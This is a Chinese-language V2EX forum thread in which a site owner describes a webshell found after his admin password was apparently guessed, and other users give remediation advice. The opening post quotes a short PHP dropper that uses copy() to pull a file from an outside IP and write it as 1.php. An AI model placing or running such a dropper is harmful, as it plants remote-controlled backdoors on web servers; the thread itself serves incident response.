网站被挂后门,后面文件已找到,但是小弟我拿它没办法

2023-09-12 10:17:20 +08:00
 Epona

事情经过: 1 个小网站前几天都还登录过去,昨天登录后台竟然提示密码不对, 再试了 3 次一样提示,心里顿时不对劲,估计被黑了,立马返回网站首页查看源代码,果然被挂了 xx 内容,然后进宝塔进网站目录查看,发现了 1.php 文件。打开发现文件是 goto 加密,思考了片刻,还原不了。

例外在其他目录文件也发现了下面的片段:

<?php
$a="copy";
$a("http://23.251.35.165/as.txt","1.php");
?>

这个远程 txt 地址就是入侵者用来生成 1.php

请各路神仙帮忙分析分析,里面都装的啥内容,希望让更多的 v 友知道,预防一下 🙏

9886 次点击
所在节点    程序员
61 条回复
SoyaDokio
2023-09-12 15:31:26 +08:00
就像楼上大哥说的,这个 webshell 并不重要,很多地方都有各种版本的这玩意儿。关注点应该是它通过什么渠道方式来到你的服务器的,然后去堵上这条路,才能保障之后不被同一个问题再干一次。
一般而言,最常见的原因就是脱裤泄露邮箱密码、未限制文件上传、输入框未做反注入。
NjcyNzMzNDQ3
2023-09-12 15:58:03 +08:00
楼上都说要查漏洞入口,我补个能最快解决的方案

1 、禁止访问外网
换 docker 运行 php 环境,禁止容器访问外网;因为木马大都是要从别处下载文件; https://codeantenna.com/a/maL0PJWMIb
2 、禁止危险函数
禁止危险的 php 函数,shell_exec ,system 之类的

这些做完后,除了 SQL 注入,项目本身的上传漏洞就没别的招了
HackerTerry
2023-09-12 16:05:09 +08:00
@yumusb 话说这个“一键 GZL”、“一键 TDK”和“一键 JSC”是什么意思啊?
BeforeTooLate
2023-09-12 16:15:49 +08:00
@Liftman 这位兄台说的对
1.网站框架下载下来,通过安全软件扫描一遍看看有没有几句话木马等后门
2.服务器方面:禁止 root 登录,只允许密钥登录
3.一般这种木马挂黑链,seo 赌博网站,你可以试试查查 site:xxx.com 选择最近日期是否收录已经被污染
如果被污染大概率 niginx 里面被写入了跳转也要查杀一遍。
4.有条件重装系统。但请先把上面几个检查好
Epona
2023-09-12 16:55:01 +08:00
再次感谢各位 v 友,目前网站筛了好几遍,目前没发现其他地方有可疑文件了,网站正常访问,后面陆续观察一段时间。

🙏🙏
justjy
2023-09-12 17:05:54 +08:00
盲猜可能:
1. 系统漏洞被利用
2. SQL 注入
3. 系统管理员或者后台管理工具(宝塔)弱口令
4. 使用了明文协议(HTTP/FTP)导致密码被窃取

如果是 SQL 注入,通过重装系统没法解决,需要排查具体漏洞并在代码层面修复
justjy
2023-09-12 17:07:16 +08:00
@Epona 有条件的话排查下 SQL 日志 检查有没有被注入
z775781
2023-09-12 18:51:30 +08:00
当务之急是找出对方怎么侵入主机,大概率是通过 web ,可以试试翻 web 日志文件,找出 shell 被访问的时间
onice
2023-09-12 19:11:32 +08:00
看 web 日志,是哪个 IP 在访问 1.php ,然后把这个 ip 的请求过滤出来。

顺着时间线梳理,看下这个 webshell 是怎么传上来的。通过日志,找到漏洞,以便修复。

然后通过 webshell 查杀工具扫描下网站目录。

参考手册:
链接: https://pan.baidu.com/s/1bHuSs8DnK-eQcRiwte_EaQ?pwd=g15i
提取码:g15i
kwanzaa
2023-09-12 21:10:23 +08:00
宝塔可还行
awolf
2023-09-12 21:25:34 +08:00
上 WAF !(我就是来喊喊)
proxytoworld
2023-09-12 22:26:33 +08:00
@Epona 我还是建议你重装,PHP 木马只是入口文件,也就是作为初始访问的手段,如果比较专业的人肯定会布置后门/木马进行持久化
Epona
2023-09-13 09:49:42 +08:00
@justjy @proxytoworld
入侵者通过网站后台弱密码进入,然后修改了密码。然后上传了码。目前搞不清楚具体是通过后台什么地方上传的文件。
nikelei
2023-09-13 09:55:38 +08:00
php 是世界上最好的语言!
justjy
2023-09-13 11:10:38 +08:00
@Epona 网站后台如果有上传功能(比如图片上传)且允许上传 php 代码到可外部访问的 web 地址,攻击者直接上传 Web Shell 然后通过 web 就能控制你的服务器了。
proxytoworld
2023-09-13 12:34:18 +08:00
@Epona 看日志和上传功能点
justfun
2023-09-13 13:03:25 +08:00
@samvvv
@easylee
winsunz
2023-09-13 14:36:42 +08:00
去 py 宝塔远程地址也是用的宝塔有手机号
gogod112121
2023-09-13 18:55:22 +08:00
@gam2046 nice
MFWT
2023-09-14 10:20:33 +08:00
仔细看了一下,这玩意核心功能是给系统一键挂马和下载指定内容的『关键词』,写入脚本,然后批量返回给百度爬虫,最终结果就是让百度搜索里面出现大量的这个关键词——上网上的多的朋友应该也碰到过了,各种『 xx 视频』,『 xx 劲爆内容』的

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://yangjunhui.monster/t/972936

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX